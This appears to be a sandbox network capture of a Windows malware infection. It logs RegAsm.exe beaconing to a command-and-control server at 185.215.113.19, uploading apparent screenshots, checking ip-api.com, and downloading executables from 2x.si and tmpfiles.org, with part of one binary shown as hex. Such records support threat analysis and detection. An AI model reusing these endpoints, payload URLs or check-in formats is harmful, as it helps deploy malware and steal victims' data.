r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Aug 31, 2024 22:42:36.993855953 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49822	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:37.109648943 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 22:42:38.152467966 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 22:42:38.156373024 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Aug 31, 2024 22:42:38.558464050 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49824	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:38.367337942 CEST	170	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODgyNTk= Host: 185.215.113.19 Content-Length: 88411 Cache-Control: no-cache
Aug 31, 2024 22:42:38.367383957 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 67 79 4e 54 6b 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODgyNTk=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:42:38.367413044 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:42:38.367430925 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:42:38.367454052 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:42:38.367475033 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:42:38.367571115 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:42:38.367585897 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:42:38.367615938 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:42:38.367630005 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:42:38.367693901 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 22:42:40.065953016 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49826	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:39.135946989 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 22:42:39.999145031 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49830	185.215.113.19	80	5472	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:44.544842958 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTA2NjI3 Host: 185.215.113.19 Content-Length: 106779 Cache-Control: no-cache
Aug 31, 2024 22:42:44.544933081 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 41 32 4e 6a 49 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTA2NjI3Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:42:44.545023918 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:42:44.545057058 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:42:44.545089006 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:42:44.545113087 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:42:44.545155048 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:42:44.545193911 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:42:44.545195103 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:42:44.545223951 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:42:44.545248032 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 22:42:46.134232044 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49829	185.215.113.19	80	5472	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:44.547805071 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 22:42:45.405739069 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 22:42:45.419501066 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 36 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52767FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Aug 31, 2024 22:42:45.781970978 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49833	185.215.113.19	80	5472	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:45.892348051 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 22:42:46.750166893 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.4	49935	208.95.112.1	80

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:43:40.900840044 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Aug 31, 2024 22:43:41.358474970 CEST	175	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:40 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	172.67.143.156	443	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:41:59 UTC	38	OUT	GET /52i.exe HTTP/1.1 Host: 2x.si
2024-08-31 20:41:59 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:41:59 GMT Content-Type: application/octet-stream Content-Length: 732672 Connection: close etag: "66d33bac-b2e00" last-modified: Sat, 31 Aug 2024 15:50:04 GMT Cache-Control: max-age=14400 CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ttBwMaXxhnyLy8ZtwdkW6PVaTkRQwVSv5z0%2BUUJFt7lbdhKC8ZZUiTZRbKg3rR4MnmOlrRlQdbUON%2FfMVYGwGUTz2QOYxVSQOsPOmX7O5NTazzexoLQjKQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd8313ec372a4-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:41:59 UTC	685	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 8c 81 93 f6 00 00 00 00 00 00 00 00 f0 00 2e 00 0b 02 30 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.0& @ `@@
2024-08-31 20:41:59 UTC	1369	IN	Data Raw: 00 62 20 f6 58 c1 a5 61 7e 93 00 00 04 7b 99 00 00 04 61 28 2b 00 00 06 28 14 00 00 0a 6f 15 00 00 0a 38 0c 00 00 00 73 16 00 00 0a 13 02 38 2c 00 00 00 11 00 20 83 d6 67 68 20 f9 a2 80 06 61 7e 93 00 00 04 7b a7 00 00 04 61 28 2b 00 00 06 28 14 00 00 0a 6f 17 00 00 0a 38 7a ff ff ff 00 73 16 00 00 0a 13 03 38 00 00 00 00 00 20 f0 3f 0a 00 8d 1e 00 00 01 25 d0 04 00 00 04 28 18 00 00 0a 73 19 00 00 0a 13 04 38 00 00 00 00 00 11 04 11 01 16 73 1a 00 00 0a 13 05 38 00 00 00 00 00 11 05 11 03 6f 1b 00 00 0a 38 00 00 00 00 11 03 6f 1c 00 00 0a 73 19 00 00 0a 13 06 38 00 00 00 00 00 1a 8d 1e 00 00 01 13 07 38 1e 00 00 00 11 06 16 73 1d 00 00 0a 13 09 38 20 00 00 00 11 07 16 28 1e 00 00 0a 13 08 38 e2 ff ff ff 11 06 11 07 16 1a 6f 1f 00 00 0a 26 38 e0 ff ff ff Data Ascii: b Xa~{a(+(o8s8, gh a~{a(+(o8zs8 ?%(s8s8o8os88s8 (8o&8
2024-08-31 20:41:59 UTC	1369	IN	Data Raw: 01 80 0f 00 00 04 16 8d 03 00 00 01 80 1a 00 00 04 17 80 28 00 00 04 16 80 2e 00 00 04 73 32 00 00 0a 80 22 00 00 04 16 80 10 00 00 04 16 6a 80 11 00 00 04 14 80 12 00 00 04 14 80 1b 00 00 04 16 6a 80 20 00 00 04 16 80 2b 00 00 04 16 80 13 00 00 04 16 80 26 00 00 04 16 80 18 00 00 04 7e 31 00 00 0a 80 1d 00 00 04 16 80 24 00 00 04 73 33 00 00 0a 80 14 00 00 04 14 80 1f 00 00 04 14 80 25 00 00 04 14 80 1e 00 00 04 14 80 21 00 00 04 14 80 15 00 00 04 14 80 23 00 00 04 7e 31 00 00 0a 80 16 00 00 04 17 28 34 00 00 0a dd 06 00 00 00 26 dd 00 00 00 00 2a 00 01 10 00 00 00 00 45 01 0b 50 01 06 14 00 00 01 06 2a 00 00 13 30 09 00 57 06 00 00 03 00 00 11 1f 10 8d 38 00 00 01 0a 20 c0 01 00 00 02 8e 69 1e 5a 20 00 02 00 00 5d 59 20 00 02 00 00 58 20 00 02 00 00 5d Data Ascii: (.s2"jj +&~1$s3%!#~1(4&EP0W8 iZ ]Y X ]
2024-08-31 20:41:59 UTC	1369	IN	Data Raw: 09 11 04 11 05 1f 0c 1f 0b 1f 2e 06 28 1a 00 00 06 12 05 11 06 09 11 04 1f 0f 1f 10 1f 2f 06 28 1a 00 00 06 12 04 11 05 11 06 09 18 1f 17 1f 30 06 28 1a 00 00 06 12 03 11 04 11 05 11 06 16 1c 1f 31 06 28 1b 00 00 06 12 06 09 11 04 11 05 1d 1f 0a 1f 32 06 28 1b 00 00 06 12 05 11 06 09 11 04 1f 0e 1f 0f 1f 33 06 28 1b 00 00 06 12 04 11 05 11 06 09 1b 1f 15 1f 34 06 28 1b 00 00 06 12 03 11 04 11 05 11 06 1f 0c 1c 1f 35 06 28 1b 00 00 06 12 06 09 11 04 11 05 19 1f 0a 1f 36 06 28 1b 00 00 06 12 05 11 06 09 11 04 1f 0a 1f 0f 1f 37 06 28 1b 00 00 06 12 04 11 05 11 06 09 17 1f 15 1f 38 06 28 1b 00 00 06 12 03 11 04 11 05 11 06 1e 1c 1f 39 06 28 1b 00 00 06 12 06 09 11 04 11 05 1f 0f 1f 0a 1f 3a 06 28 1b 00 00 06 12 05 11 06 09 11 04 1c 1f 0f 1f 3b 06 28 1b 00 00 Data Ascii: .(/(0(1(2(3(4(5(6(7(8(9(:(;(
2024-08-31 20:41:59 UTC	1369	IN	Data Raw: 0c 12 00 20 0c 00 00 00 62 fe 0c 12 00 59 fe 0c 12 00 61 fe 0c 12 00 58 fe 0e 12 00 fe 0c 12 00 76 6c 6d 58 13 04 11 08 07 17 59 40 50 00 00 00 06 16 3e 49 00 00 00 11 04 11 06 61 13 0e 16 13 0f 38 2d 00 00 00 11 0f 16 3e 0c 00 00 00 11 0b 1e 62 13 0b 11 0c 1e 58 13 0c 08 11 0a 11 0f 58 11 0e 11 0b 5f 11 0c 1f 1f 5f 64 d2 9c 11 0f 17 58 13 0f 11 0f 06 3f cb ff ff ff 38 49 00 00 00 11 04 11 06 61 13 10 08 11 0a 11 10 20 ff 00 00 00 5f d2 9c 08 11 0a 17 58 11 10 20 00 ff 00 00 5f 1e 64 d2 9c 08 11 0a 18 58 11 10 20 00 00 ff 00 5f 1f 10 64 d2 9c 08 11 0a 19 58 11 10 20 00 00 00 ff 5f 1f 18 64 d2 9c 11 08 17 58 13 08 11 08 07 3f cf fc ff ff 08 80 2a 00 00 04 2a 00 00 1b 30 03 00 6a 00 00 00 05 00 00 11 14 0a 28 1d 00 00 06 39 0b 00 00 00 73 37 00 00 0a 0a 38 Data Ascii: bYaXvlmXY@P>Ia8->bXX__dX?8Ia _X _dX _dX _dX?**0j(9s78
2024-08-31 20:41:59 UTC	1369	IN	Data Raw: 13 1c 11 1c 20 00 00 00 40 5f 16 fe 02 13 1d 11 1c 20 ff ff ff 3f 5f 13 1c d0 09 00 00 02 28 20 00 00 0a 6f 4d 00 00 0a 11 1c 06 6f 4e 00 00 0a 16 8d 21 00 00 01 6f 4f 00 00 0a 74 32 00 00 01 13 1e 11 1e 6f 50 00 00 0a 39 1b 00 00 00 11 1a 14 11 1a 6f 51 00 00 0a 11 1e 28 2c 00 00 0a 6f 2d 00 00 0a dd 6f 01 00 00 11 1e 6f 52 00 00 0a 13 1f 11 1f 8e 69 17 58 13 20 11 20 8d 21 00 00 01 13 21 11 1e 6f 53 00 00 0a 6f 54 00 00 0a 39 15 00 00 00 11 21 16 11 1e 6f 53 00 00 0a 6f 55 00 00 0a a2 38 0e 00 00 00 11 21 16 d0 14 00 00 01 28 20 00 00 0a a2 16 13 24 38 17 00 00 00 11 21 11 24 17 58 11 1f 11 24 9a 6f 56 00 00 0a a2 11 24 17 58 13 24 11 24 11 1f 8e 69 3f de ff ff ff 7e 57 00 00 0a 11 1e 6f 58 00 00 0a 11 21 06 17 73 59 00 00 0a 13 22 11 22 6f 5a 00 00 0a Data Ascii: @_ ?_( oMoN!oOt2oP9oQ(,o-ooRiX !!oSoT9!oSoU8!( $8!$X$oV$X$$i?~WoX!sY""oZ
2024-08-31 20:41:59 UTC	1369	IN	Data Raw: 00 eb 1e 00 00 66 25 00 00 da 00 00 00 a3 00 00 00 ce 0e 00 00 47 0b 00 00 94 07 00 00 99 0c 00 00 34 08 00 00 a7 13 00 00 b3 1d 00 00 c6 22 00 00 58 12 00 00 72 2b 00 00 c3 1e 00 00 f4 1b 00 00 75 2a 00 00 84 2c 00 00 bf 01 00 00 df 18 00 00 ab 06 00 00 0b 28 00 00 58 01 00 00 7b 1b 00 00 a5 2b 00 00 61 1f 00 00 fa 17 00 00 e2 05 00 00 7c 0f 00 00 ee 08 00 00 aa 20 00 00 96 11 00 00 f2 2a 00 00 d2 10 00 00 b1 0c 00 00 5e 10 00 00 39 0d 00 00 91 15 00 00 3a 1b 00 00 f3 24 00 00 9b 2d 00 00 87 12 00 00 0f 1d 00 00 e7 0e 00 00 76 05 00 00 c1 2f 00 00 5b 0a 00 00 84 0a 00 00 68 2f 00 00 80 19 00 00 64 06 00 00 20 03 00 00 89 1f 00 00 1a 29 00 00 56 02 00 00 32 05 00 00 cf 16 00 00 10 2f 00 00 7d 2e 00 00 ae 23 00 00 4a 11 00 00 b5 0e 00 00 bd 1b 00 00 c3 27 Data Ascii: f%G4"Xr+u,(X{+a\| ^9:$-v/[h/d )V2/}.#J'
2024-08-31 20:41:59 UTC	1369	IN	Data Raw: 00 00 00 58 fe 0e 02 00 20 8d 00 00 00 38 b1 f7 ff ff fe 0c 07 00 20 03 00 00 00 fe 0c 06 00 9c 20 af 00 00 00 28 5a 00 00 06 3a 94 f7 ff ff 26 20 75 00 00 00 38 89 f7 ff ff 20 10 00 00 00 20 60 00 00 00 58 fe 0e 02 00 20 5f 00 00 00 28 5b 00 00 06 39 6b f7 ff ff 26 20 4b 00 00 00 38 60 f7 ff ff 20 8c 00 00 00 20 2e 00 00 00 59 fe 0e 08 00 20 18 00 00 00 28 5a 00 00 06 39 42 f7 ff ff 26 20 24 00 00 00 38 37 f7 ff ff fe 0c 0d 00 20 05 00 00 00 fe 0c 08 00 9c 20 61 01 00 00 38 1f f7 ff ff fe 0c 0d 00 20 1c 00 00 00 20 22 00 00 00 20 77 00 00 00 58 9c 20 8e 00 00 00 38 00 f7 ff ff 20 ab 00 00 00 20 39 00 00 00 59 fe 0e 08 00 20 df 00 00 00 38 e7 f6 ff ff 20 80 00 00 00 20 2a 00 00 00 59 fe 0e 02 00 20 71 01 00 00 28 5a 00 00 06 3a c9 f6 ff ff 26 20 fa 00 00 Data Ascii: X 8 (Z:& u8 `X _([9k& K8` .Y (Z9B& $87 a8 " wX 8 9Y 8 *Y q(Z:&
2024-08-31 20:41:59 UTC	1369	IN	Data Raw: 00 00 00 28 5a 00 00 06 39 5d f2 ff ff 26 20 6e 00 00 00 38 52 f2 ff ff fe 0c 0d 00 20 04 00 00 00 fe 0c 08 00 9c 20 57 01 00 00 28 5b 00 00 06 3a 35 f2 ff ff 26 20 60 01 00 00 38 2a f2 ff ff fe 0c 0d 00 20 17 00 00 00 fe 0c 02 00 9c 20 3a 00 00 00 28 5b 00 00 06 3a 0d f2 ff ff 26 20 84 00 00 00 38 02 f2 ff ff fe 0c 0d 00 20 08 00 00 00 20 2f 00 00 00 20 3a 00 00 00 58 9c 20 7e 00 00 00 28 5b 00 00 06 39 de f1 ff ff 26 20 14 00 00 00 38 d3 f1 ff ff fe 0c 0d 00 20 05 00 00 00 fe 0c 08 00 9c 20 fe 00 00 00 28 5a 00 00 06 3a b6 f1 ff ff 26 20 d1 00 00 00 38 ab f1 ff ff 20 db 00 00 00 20 1e 00 00 00 58 fe 0e 02 00 20 cc 00 00 00 28 5b 00 00 06 3a 8d f1 ff ff 26 20 50 01 00 00 38 82 f1 ff ff 20 5d 00 00 00 20 54 00 00 00 59 fe 0e 02 00 20 06 00 00 00 38 69 f1 Data Ascii: (Z9]& n8R W([:5& `8* :([:& 8 / :X ~([9& 8 (Z:& 8 X ([:& P8 ] TY 8i
2024-08-31 20:41:59 UTC	1369	IN	Data Raw: ed ff ff fe 0c 0d 00 20 1d 00 00 00 fe 0c 02 00 9c 20 c2 00 00 00 38 f6 ec ff ff fe 0c 0d 00 20 12 00 00 00 fe 0c 08 00 9c 20 06 00 00 00 28 5a 00 00 06 39 d9 ec ff ff 26 20 8b 00 00 00 38 ce ec ff ff 20 d5 00 00 00 20 47 00 00 00 59 fe 0e 02 00 20 6c 00 00 00 38 b5 ec ff ff fe 0c 0d 00 20 09 00 00 00 fe 0c 08 00 9c 20 0f 01 00 00 38 9d ec ff ff 20 e8 00 00 00 20 4d 00 00 00 59 fe 0e 00 00 20 e8 00 00 00 28 5b 00 00 06 39 7f ec ff ff 26 20 86 00 00 00 38 74 ec ff ff fe 0c 07 00 20 03 00 00 00 fe 0c 06 00 9c 20 26 01 00 00 28 5b 00 00 06 39 57 ec ff ff 26 20 de 00 00 00 38 4c ec ff ff 20 66 00 00 00 20 51 00 00 00 58 fe 0e 02 00 20 67 01 00 00 28 5a 00 00 06 3a 2e ec ff ff 26 20 65 00 00 00 38 23 ec ff ff 20 e3 00 00 00 20 4b 00 00 00 59 fe 0e 08 00 20 36 Data Ascii: 8 (Z9& 8 GY l8 8 MY ([9& 8t &([9W& 8L f QX g(Z:.& e8# KY 6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49744	104.21.21.16	443	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:06 UTC	58	OUT	GET /dl/12050075/loli.exe HTTP/1.1 Host: tmpfiles.org
2024-08-31 20:42:07 UTC	1343	IN	HTTP/1.1 404 Not Found Date: Sat, 31 Aug 2024 20:42:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, private CF-Cache-Status: BYPASS Set-Cookie: XSRF-TOKEN=eyJpdiI6Ik5rOTRXbXJKQ3UxZm9tTk5GRnpGZmc9PSIsInZhbHVlIjoiUFI3Z0pORkEweFJqOXllNStmVlJOWWhBOUtHYkdBb3lXSFRncjNwdnB2NlZ3K3JTbVQ0TnJ4Z1RRK1lTcTBsUWlsQ3pnUUFFUnk1eE5ZM0t3ZnpHTE9FRDFzOVI0SUxYVzZoL1RHbE5peEQxSG1SQ0xvemZlUktzOEdqd2ViRmciLCJtYWMiOiI1ZjQzY2FhMWVjOWYyNGE3ZThlYjY4YjgxZmY0NjY5MTczY2U1MjQ0NDRhZWJjZjBmNzQ3N2JjZGJlNTkzZWJmIn0%3D; expires=Sat, 31-Aug-2024 22:42:06 GMT; Max-Age=7200; path=/; samesite=lax Set-Cookie: tmpfiles_session=eyJpdiI6IjgwM1pHV1MvT2N3Z2lLVFZZVWQ1NFE9PSIsInZhbHVlIjoiUE95bElQcGM0QmdYcUlGT3hGSGp0dThiL1AxWVc4SC82aFFnSnRieG0rTWpwN2VoZDA1bi9IMmJWT2pVZ2tiZ0kvcG9KWFk1Z2trUnR6NFdtd0ZpSE12RGZYZjdqQUNuMVNES09IMTUyOTZOcVZGNU56RklXbXRLZWFQN2tLZjgiLCJtYWMiOiI5ZWIyNzVmZTJjNjg3ODU1YzZjYTA3NjZiMDA2YjY3OWM1ZWQ1MDk1MTJlN2RlZTRkZTU0NDdhOTg2ZTU0OTg3In0%3D; expires=Sat, 31-Aug-2024 22:42:06 GMT; Max-Age=7200; path=/; httponly; samesite=lax Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XWV6tssYwI1p%2B4TKF4GPcLJqBrHsqf2haCw9Ye99YKRZvBnrf9lE2UOR2Yzn0RZgcIloou%2F%2F5%2FjTyhGWQKHBkQOuXXA7t5hY1w1hrVMBJBKQOG9%2Ftj2L3c56Krkz%2FPE%3D"}],"group":"cf-nel","max_age":604800}
